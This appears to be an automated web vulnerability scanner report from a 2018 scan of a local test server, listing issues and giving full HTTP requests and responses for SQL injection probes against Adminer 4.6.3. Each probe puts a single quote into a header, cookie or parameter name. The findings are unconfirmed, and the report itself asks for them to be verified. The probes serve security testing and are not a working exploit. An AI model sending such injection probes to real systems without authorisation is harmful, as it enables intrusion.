19.324. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path folder 4]

19.325. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path filename]

19.326. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path folder 1]

19.327. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path folder 2]

19.328. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path folder 3]

19.329. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path folder 4]

19.330. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path filename]

19.331. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path folder 1]

19.332. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path folder 2]

19.333. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path folder 3]

19.334. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path folder 4]

19.335. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path filename]

19.336. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path folder 1]

19.337. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path folder 2]

19.338. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path folder 3]

19.339. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path folder 4]

19.340. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path filename]

19.341. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path folder 1]

19.342. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path folder 2]

19.343. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path folder 3]

19.344. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path folder 4]

19.345. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path filename]

19.346. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path folder 1]

19.347. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path folder 2]

19.348. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path folder 3]

19.349. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path folder 4]

19.350. http://localhost/phpmyadmin/js/vendor/js.cookie.js [URL path filename]

19.351. http://localhost/phpmyadmin/js/vendor/js.cookie.js [URL path folder 1]

19.352. http://localhost/phpmyadmin/js/vendor/js.cookie.js [URL path folder 2]

19.353. http://localhost/phpmyadmin/js/vendor/js.cookie.js [URL path folder 3]

19.354. http://localhost/phpmyadmin/js/vendor/sprintf.js [URL path filename]

19.355. http://localhost/phpmyadmin/js/vendor/sprintf.js [URL path folder 1]

19.356. http://localhost/phpmyadmin/js/vendor/sprintf.js [URL path folder 2]

19.357. http://localhost/phpmyadmin/js/vendor/sprintf.js [URL path folder 3]

19.358. http://localhost/phpmyadmin/js/vendor/tracekit.js [URL path filename]

19.359. http://localhost/phpmyadmin/js/vendor/tracekit.js [URL path folder 1]

19.360. http://localhost/phpmyadmin/js/vendor/tracekit.js [URL path folder 2]

19.361. http://localhost/phpmyadmin/js/vendor/tracekit.js [URL path folder 3]

19.362. http://localhost/phpmyadmin/js/whitelist.php [URL path filename]

19.363. http://localhost/phpmyadmin/js/whitelist.php [URL path folder 1]

19.364. http://localhost/phpmyadmin/js/whitelist.php [URL path folder 2]

19.365. http://localhost/phpmyadmin/js/whitelist.php [name of an arbitrarily supplied URL parameter]

19.366. http://localhost/phpmyadmin/setup/ [URL path folder 2]

19.367. http://localhost/phpmyadmin/sql/ [URL path folder 2]

19.368. http://localhost/phpmyadmin/themes/ [URL path folder 2]

19.369. http://localhost/phpmyadmin/url.php [URL path filename]

19.370. http://localhost/phpmyadmin/url.php [URL path folder 1]

19.371. http://localhost/phpmyadmin/url.php [name of an arbitrarily supplied URL parameter]

19.372. http://localhost/phpmyadmin/url.php [url parameter]

19.373. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path filename]

19.374. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 1]

19.375. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 2]

19.376. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 3]

19.377. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 4]

19.378. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 5]

19.379. http://localhost/phpsysinfo/index.php [URL path filename]

19.380. http://localhost/phpsysinfo/index.php [URL path folder 1]

19.381. http://localhost/phpsysinfo/index.php [name of an arbitrarily supplied URL parameter]

20. Cross-domain Referer leakage

20.1. http://localhost/

20.2. http://localhost/

20.3. http://localhost/phpmyadmin/doc/html/search.html

20.4. http://localhost/phpsysinfo/index.php

21. Frameable response (potential Clickjacking)

21.1. http://localhost/

21.2. http://localhost/examplewebiste/vulnerabilities/csrf/

22. Browser cross-site scripting filter disabled

23. HTTP TRACE method is enabled

24. Link manipulation (reflected)

25. DOM data manipulation (DOM-based)

26. Directory listing

27. Email addresses disclosed

28. HTML does not specify charset

28.1. http://localhost/examplewebiste/docs/pdf

28.2. http://localhost/examplewebiste/docs/pdf.html


1. SQL injection
Next

There are 25 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. It is strongly recommended that you parameterize every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

References

Vulnerability classifications



1.1. http://localhost/adminer [Referer HTTP header]
Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Referer: https://example.com/'

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=lg8lutgtng09da63f83g0brbrk; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=8e8e32f422c19c735310c18847f50d39; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-N2RmMDU0MTA1N2Q3ZGQ4YTc2Y2RlMjlmMzc3YzIwODE=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.2. http://localhost/adminer [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:49 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=ebl49valm8e3t3luaj9gj1i77l; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=1737cd8afcfb5861a9dac85f4750e149; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTE4NjNiYzQ4ZGYxZjNhN2U2ZTg5YWZkNDQ4ZjM1OWU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4323
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.3. http://localhost/adminer [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer?1'=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=f5hj5748l3adcbos0fubfmjamg; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=3699917b1d6762a6017930caae341fec; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MDVjZGRlYjJlOGE4M2FkYTE0NWJiOWJhMDM4MWQ2YjM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4323
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.4. http://localhost/adminer/ [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/?lang=czech'

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:54 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=69a01bj7e2pe5m1poc91p67os6; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=9cb021c428caa6f98e0d71d33d47c873; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZTY0ZmM0MmU2M2Q2ZTMyODdhNGEyZWY1OGFkZWMwZGM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.5. http://localhost/adminer/ [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://localhost/?lang=czech

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=mboqdtg7k6t958hlp2q17lvssu; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=23a2c5ea1c523b33b80fa9d2caaf254e; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NjdlYTBmY2Q4ZWRiYzZiZTI2OGJiZTNjNGI3NmQ3ZWM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4323
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.6. http://localhost/adminer/ [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer/?1'=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/?lang=czech

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=smjkqe533cqngmde7n3af1vcpr; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=a443604b314755ce721033019a490a2b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-Y2YwMjA1NzFiYzk1OWZiMjliMzA3YTgwYjUyNDFmNWY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.7. http://localhost/adminer/adminer-4.6.3.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php'
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:09:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:09:33 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NzQ5NWUwNWY1MTRjN2Q4ZGNhYWViNTYwZWQyYTVhYzg=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4325
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.8. http://localhost/adminer/adminer-4.6.3.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:08:54 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:08:54 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NWIyMzBhOTVkNzJjOGZkNTFmMWRhZWM1MjAzNTVkODg=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.9. http://localhost/adminer/adminer-4.6.3.php [adminer_key cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The adminer_key cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adminer_key cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f'

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:05:19 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f%27; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MGM5NzM4NDdlMTI5NWJmOWJkYjEwYWFkY2U0M2NhZTA=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4320
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.10. http://localhost/adminer/adminer-4.6.3.php [adminer_lang cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The adminer_lang cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adminer_lang cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=qfd3ckvk0mlk5hrpl41rj5kln4; adminer_key=67912841158106235c36bdcddfcda778; adminer_lang=bg'

lang=bg&token=815669%3a574877

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:06:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=bg; expires=Sat, 17 Nov 2018 21:06:36 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=67912841158106235c36bdcddfcda778; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTg1ZjYyNjY2NGY3ZmQyNDYyNDllNmM1M2YyNzRmMWI=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4400
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="bg" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>........ - Adminer</title>
<link rel="style
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.11. http://localhost/adminer/adminer-4.6.3.php [adminer_permanent cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The adminer_permanent cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adminer_permanent cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent='

lang=en&token=271469%3a613140

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:14:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:14:29 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=%27; expires=Sat, 17 Nov 2018 21:14:29 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
